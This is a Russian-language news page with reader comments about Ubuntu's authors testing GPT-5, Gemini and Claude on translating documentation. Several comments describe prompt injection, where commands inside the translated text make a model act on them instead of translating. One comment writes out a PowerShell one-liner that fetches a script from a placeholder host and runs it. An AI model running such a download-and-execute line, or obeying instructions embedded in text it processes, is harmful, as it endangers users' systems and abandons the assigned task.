Обновить

GPT-5 отказался работать, Gemini назвал жалобу «необоснованной»: авторы Ubuntu протестировали ИИ на своей документации

Время на прочтение1 мин
Охват и читатели16K
Всего голосов 12: ↑10 и ↓2+9
Комментарии16

Комментарии 16

Без DeepSeek перечень не полный

128к токенов, слишком мало для задачи + их технология внимания на определенных участках, без чтения всего текста, выдаст много ошибок (имхо)

Да в принципе должно хватить, по крайней мере в вопросах документации. Но да, не хватает еще мистраля да и многих других моделей

Из неожиданного - перевод документации именно прикладного ПО - одна из сложных для LLM. За счет того, что текст, который надо переводить отравляет контекст. Условная строчка "Click on OK button to close the dialog" воспринимается как прямая команда AI куда-то там кликнуть. Точно так же отравлением контекста при задаче перевода являются изолированные вопросы. ИИшечка порой забивает на часть "переведи" и начинает отвечать. Пока так, имеем что имеем.

Проще говоря, вместо перевода начинает ловить текстовые инъекции, т.к. документация - вещь специфичная, где много команд. Получается помимо галлюцинаций, программистам надо ещё работать над "перехватом" выполнения инструкций ИИ.

Скорее нужно ещё на этапе обучения, сделать разметку для обучающих данных где команды от пользователя будут специально выделены, чтобы ИИ мог уверенно отличать одно от другого

Мне ChatGPT когда-то посоветовал использовать для целей разметки конструкцию:

```python title="[путь_и_имя_файла]"
[текст_файла]
```

Вместо python, соответственно, может быть sql, markdown, yaml, html, text, ...

Как и ChatGPT, так и другие ИИ, если их сообщение можно скопировать как markdown, используют при вставке кода конструкции, типа:

```json
[текст]
```

Кто-нибудь уже попробовал перевести текст про БД, с условным DROP DATABASEвнутри?

Лол, это же буквально:

irm https://example.tld/script.ps1 | iex

- получается, так.

Первая задача — перевести документацию с британского английского на американский. Claude Sonnet справился на 7 из 10, GPT-5 получил ноль баллов — просто отказался выполнять задачу без объяснения причин. Gemini работал медленно, а потом начал менять слова в обратную сторону.

LLM-у забыли объяснить, что британский английский и американский английский это разные языки?

GPT-5 получил ноль баллов — просто отказался выполнять задачу без объяснения причин.

Фильтр не пропустил объяснение.

и выложила все промпты и скрипты в открытый доступ.

Непонятно только одно - а зачем нам её неработающие промпты?

Это исключительно правильное решение, нужное, чтобы гениальный промпт инжинеры (от которых последнее время очень много статей) - либо пришли и сказали "вот тут надо исправить и тогда заработает" и показали этим свою реальную гениальность, либо не смогли сослаться на "вы всё врети, просто промпт у вас кривой", что частенько бывает аргументом в дискуссии.

Отрицательный результат тоже результат. Без иронии.

Это справедливо для тех случаев, когда результат есть.

Я заметил одну особенность, чем больше у ИИ не получается, тем больше лайков собирает пост.

Ну да когда сам пишешь, проверять же не надо)

Зарегистрируйтесь на Хабре, чтобы оставить комментарий

Другие новости